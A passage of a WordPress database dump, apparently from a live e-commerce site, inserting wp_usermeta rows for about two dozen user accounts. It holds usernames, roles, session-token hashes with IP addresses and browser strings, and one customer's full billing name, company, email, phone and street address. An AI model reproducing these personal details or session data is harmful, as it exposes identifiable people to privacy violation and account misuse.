INSERT INTO `wp_usermeta` VALUES (28591, 1987, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28592, 1987, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28593, 1987, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28594, 1987, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28595, 1987, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28596, 1987, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28597, 1987, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28598, 1987, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28599, 1987, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28600, 1987, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28601, 1987, '_yoast_wpseo_profile_updated', '1501330034'); 
INSERT INTO `wp_usermeta` VALUES (28602, 1987, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28603, 1988, 'nickname', 'tori_hunter1969'); 
INSERT INTO `wp_usermeta` VALUES (28604, 1988, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28605, 1988, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28606, 1988, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28607, 1988, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28608, 1988, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28609, 1988, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28610, 1988, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28611, 1988, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28612, 1988, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28613, 1988, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28614, 1988, '_yoast_wpseo_profile_updated', '1501352345'); 
INSERT INTO `wp_usermeta` VALUES (28615, 1988, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28616, 1989, 'nickname', 'dishawndrea1985'); 
INSERT INTO `wp_usermeta` VALUES (28617, 1989, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28618, 1989, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28619, 1989, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28620, 1989, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28621, 1989, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28622, 1989, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28623, 1989, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28624, 1989, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28625, 1989, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28626, 1989, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28627, 1989, '_yoast_wpseo_profile_updated', '1501355303'); 
INSERT INTO `wp_usermeta` VALUES (28628, 1989, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28629, 1990, 'nickname', 'sdiamante081995'); 
INSERT INTO `wp_usermeta` VALUES (28630, 1990, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28631, 1990, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28632, 1990, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28633, 1990, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28634, 1990, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28635, 1990, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28636, 1990, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28637, 1990, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28638, 1990, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28639, 1990, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28640, 1990, '_yoast_wpseo_profile_updated', '1501364146'); 
INSERT INTO `wp_usermeta` VALUES (28641, 1990, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28642, 1991, 'nickname', 'matthew18901986'); 
INSERT INTO `wp_usermeta` VALUES (28643, 1991, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28644, 1991, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28645, 1991, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28646, 1991, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28647, 1991, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28648, 1991, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28649, 1991, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28650, 1991, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28651, 1991, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28652, 1991, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28653, 1991, '_yoast_wpseo_profile_updated', '1501378408'); 
INSERT INTO `wp_usermeta` VALUES (28654, 1991, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28655, 1992, 'nickname', 'onbehalfofmattrs'); 
INSERT INTO `wp_usermeta` VALUES (28656, 1992, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28657, 1992, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28658, 1992, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28659, 1992, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28660, 1992, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28661, 1992, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28662, 1992, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28663, 1992, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28664, 1992, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28665, 1992, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28666, 1992, '_yoast_wpseo_profile_updated', '1501380827'); 
INSERT INTO `wp_usermeta` VALUES (28667, 1992, 'session_tokens', 'a:1:{s:64:"9b8a21b3e10dd350ba4927a832b208ce48470dd3e97bacefd351b9c6cba9d3c5";a:4:{s:10:"expiration";i:1502590437;s:2:"ip";s:10:"75.65.7.40";s:2:"ua";s:135:"Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1";s:5:"login";i:1501380837;}}'); 
INSERT INTO `wp_usermeta` VALUES (28668, 1993, 'nickname', 'fastlap1987'); 
INSERT INTO `wp_usermeta` VALUES (28669, 1993, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28670, 1993, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28671, 1993, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28672, 1993, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28673, 1993, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28674, 1993, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28675, 1993, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28676, 1993, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28677, 1993, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28678, 1993, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28679, 1993, '_yoast_wpseo_profile_updated', '1501404951'); 
INSERT INTO `wp_usermeta` VALUES (28680, 1993, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28681, 1994, 'nickname', 'crocus44441988'); 
INSERT INTO `wp_usermeta` VALUES (28682, 1994, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28683, 1994, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28684, 1994, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28685, 1994, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28686, 1994, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28687, 1994, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28688, 1994, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28689, 1994, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28690, 1994, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28691, 1994, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28692, 1994, '_yoast_wpseo_profile_updated', '1501405481'); 
INSERT INTO `wp_usermeta` VALUES (28693, 1994, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28694, 1995, 'nickname', 'nagy_melis2005'); 
INSERT INTO `wp_usermeta` VALUES (28695, 1995, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28696, 1995, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28697, 1995, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28698, 1995, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28699, 1995, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28700, 1995, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28701, 1995, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28702, 1995, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28703, 1995, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28704, 1995, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28705, 1995, '_yoast_wpseo_profile_updated', '1501426928'); 
INSERT INTO `wp_usermeta` VALUES (28706, 1995, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28707, 1996, 'nickname', 'bernardvronneau1984'); 
INSERT INTO `wp_usermeta` VALUES (28708, 1996, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28709, 1996, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28710, 1996, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28711, 1996, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28712, 1996, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28713, 1996, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28714, 1996, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28715, 1996, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28716, 1996, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28717, 1996, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28718, 1996, '_yoast_wpseo_profile_updated', '1501429490'); 
INSERT INTO `wp_usermeta` VALUES (28719, 1996, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28720, 1997, 'nickname', 'cortesdesign1975'); 
INSERT INTO `wp_usermeta` VALUES (28721, 1997, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28722, 1997, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28723, 1997, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28724, 1997, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28725, 1997, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28726, 1997, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28727, 1997, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28728, 1997, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28729, 1997, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28730, 1997, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28731, 1997, '_yoast_wpseo_profile_updated', '1501430495'); 
INSERT INTO `wp_usermeta` VALUES (28732, 1997, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28733, 1998, 'nickname', 'kempler331975'); 
INSERT INTO `wp_usermeta` VALUES (28734, 1998, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28735, 1998, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28736, 1998, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28737, 1998, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28738, 1998, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28739, 1998, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28740, 1998, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28741, 1998, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28742, 1998, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28743, 1998, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28744, 1998, '_yoast_wpseo_profile_updated', '1501430787'); 
INSERT INTO `wp_usermeta` VALUES (28745, 1998, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28746, 1999, 'nickname', 'streeper1955'); 
INSERT INTO `wp_usermeta` VALUES (28747, 1999, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28748, 1999, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28749, 1999, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28750, 1999, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28751, 1999, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28752, 1999, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28753, 1999, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28754, 1999, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28755, 1999, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28756, 1999, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28757, 1999, '_yoast_wpseo_profile_updated', '1501434639'); 
INSERT INTO `wp_usermeta` VALUES (28758, 1999, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28759, 2000, 'nickname', 'Jud'); 
INSERT INTO `wp_usermeta` VALUES (28760, 2000, 'first_name', 'Jud'); 
INSERT INTO `wp_usermeta` VALUES (28761, 2000, 'last_name', 'Phillips'); 
INSERT INTO `wp_usermeta` VALUES (28762, 2000, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28763, 2000, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28764, 2000, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28765, 2000, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28766, 2000, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28767, 2000, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28768, 2000, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28769, 2000, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28770, 2000, '_yoast_wpseo_profile_updated', '1501436173'); 
INSERT INTO `wp_usermeta` VALUES (28771, 2000, 'session_tokens', 'a:1:{s:64:"8a89b4565dcf76db27982e0aceebd6df28c44a3ba22dffb26ebabd9ee63f6d83";a:4:{s:10:"expiration";i:1502645781;s:2:"ip";s:12:"96.84.141.50";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501436181;}}'); 
INSERT INTO `wp_usermeta` VALUES (28772, 2000, 'billing_first_name', 'Jud'); 
INSERT INTO `wp_usermeta` VALUES (28773, 2000, 'billing_last_name', 'Phillips'); 
INSERT INTO `wp_usermeta` VALUES (28774, 2000, 'billing_company', 'Sam Phillips Recording Studios, Inc'); 
INSERT INTO `wp_usermeta` VALUES (28775, 2000, 'billing_email', 'jud@samphillipsmusicgroup.com'); 
INSERT INTO `wp_usermeta` VALUES (28776, 2000, 'billing_phone', '901-523-2251'); 
INSERT INTO `wp_usermeta` VALUES (28777, 2000, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (28778, 2000, 'billing_address_1', '639 Madison Ave'); 
INSERT INTO `wp_usermeta` VALUES (28779, 2000, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (28780, 2000, 'billing_city', 'Memphis'); 
INSERT INTO `wp_usermeta` VALUES (28781, 2000, 'billing_state', 'TN'); 
INSERT INTO `wp_usermeta` VALUES (28782, 2000, 'billing_postcode', '38103'); 
INSERT INTO `wp_usermeta` VALUES (28783, 2000, 'last_update', '1501436364'); 
INSERT INTO `wp_usermeta` VALUES (28784, 2000, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (28785, 2001, 'nickname', 'jaymemaness2007'); 
INSERT INTO `wp_usermeta` VALUES (28786, 2001, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28787, 2001, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28788, 2001, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28789, 2001, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28790, 2001, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28791, 2001, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28792, 2001, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28793, 2001, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28794, 2001, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28795, 2001, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28796, 2001, '_yoast_wpseo_profile_updated', '1501441622'); 
INSERT INTO `wp_usermeta` VALUES (28797, 2001, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28798, 2002, 'nickname', 'coled21973'); 
INSERT INTO `wp_usermeta` VALUES (28799, 2002, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28800, 2002, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28801, 2002, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28802, 2002, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28803, 2002, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28804, 2002, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28805, 2002, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28806, 2002, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28807, 2002, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28808, 2002, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28809, 2002, '_yoast_wpseo_profile_updated', '1501442874'); 
INSERT INTO `wp_usermeta` VALUES (28810, 2002, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28811, 2003, 'nickname', 'rachaelperriello1984'); 
INSERT INTO `wp_usermeta` VALUES (28812, 2003, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28813, 2003, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28814, 2003, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28815, 2003, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28816, 2003, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28817, 2003, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28818, 2003, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28819, 2003, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28820, 2003, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28821, 2003, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28822, 2003, '_yoast_wpseo_profile_updated', '1501443183'); 
INSERT INTO `wp_usermeta` VALUES (28823, 2003, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28824, 2004, 'nickname', 'yifanhu051951'); 
INSERT INTO `wp_usermeta` VALUES (28825, 2004, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28826, 2004, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28827, 2004, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28828, 2004, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28829, 2004, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28830, 2004, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28831, 2004, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28832, 2004, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28833, 2004, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28834, 2004, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28835, 2004, '_yoast_wpseo_profile_updated', '1501452139'); 
INSERT INTO `wp_usermeta` VALUES (28836, 2004, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28837, 2005, 'nickname', 'jmschoepf1971'); 
INSERT INTO `wp_usermeta` VALUES (28838, 2005, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28839, 2005, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28840, 2005, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28841, 2005, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28842, 2005, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28843, 2005, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28844, 2005, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28845, 2005, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28846, 2005, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28847, 2005, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28848, 2005, '_yoast_wpseo_profile_updated', '1501454480'); 
INSERT INTO `wp_usermeta` VALUES (28849, 2005, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28850, 2006, 'nickname', 'mjrupert23291992'); 
INSERT INTO `wp_usermeta` VALUES (28851, 2006, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28852, 2006, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28853, 2006, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28854, 2006, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28855, 2006, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28856, 2006, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28857, 2006, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28858, 2006, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28859, 2006, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28860, 2006, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28861, 2006, '_yoast_wpseo_profile_updated', '1501462206'); 
INSERT INTO `wp_usermeta` VALUES (28862, 2006, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28863, 2007, 'nickname', 'i.dot.jufro1963'); 
INSERT INTO `wp_usermeta` VALUES (28864, 2007, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28865, 2007, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28866, 2007, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28867, 2007, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28868, 2007, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28869, 2007, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28870, 2007, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28871, 2007, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28872, 2007, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28873, 2007, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28874, 2007, '_yoast_wpseo_profile_updated', '1501466994'); 
INSERT INTO `wp_usermeta` VALUES (28875, 2007, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28876, 2008, 'nickname', 'alibijj1950'); 
INSERT INTO `wp_usermeta` VALUES (28877, 2008, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28878, 2008, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28879, 2008, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28880, 2008, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28881, 2008, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28882, 2008, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28883, 2008, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28884, 2008, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28885, 2008, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28886, 2008, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28887, 2008, '_yoast_wpseo_profile_updated', '1501470296'); 
INSERT INTO `wp_usermeta` VALUES (28888, 2008, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28889, 2009, 'nickname', 'kbrandco1983'); 
INSERT INTO `wp_usermeta` VALUES (28890, 2009, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28891, 2009, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28892, 2009, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28893, 2009, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28894, 2009, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28895, 2009, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28896, 2009, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28897, 2009, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28898, 2009, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (28899, 2009, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (28900, 2009, '_yoast_wpseo_profile_updated', '1501472113'); 
INSERT INTO `wp_usermeta` VALUES (28901, 2009, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (28902, 2010, 'nickname', 'lfvres1956'); 
INSERT INTO `wp_usermeta` VALUES (28903, 2010, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28904, 2010, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (28905, 2010, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (28906, 2010, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28907, 2010, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (28908, 2010, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (28909, 2010, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (28910, 2010, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (28911, 2010, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
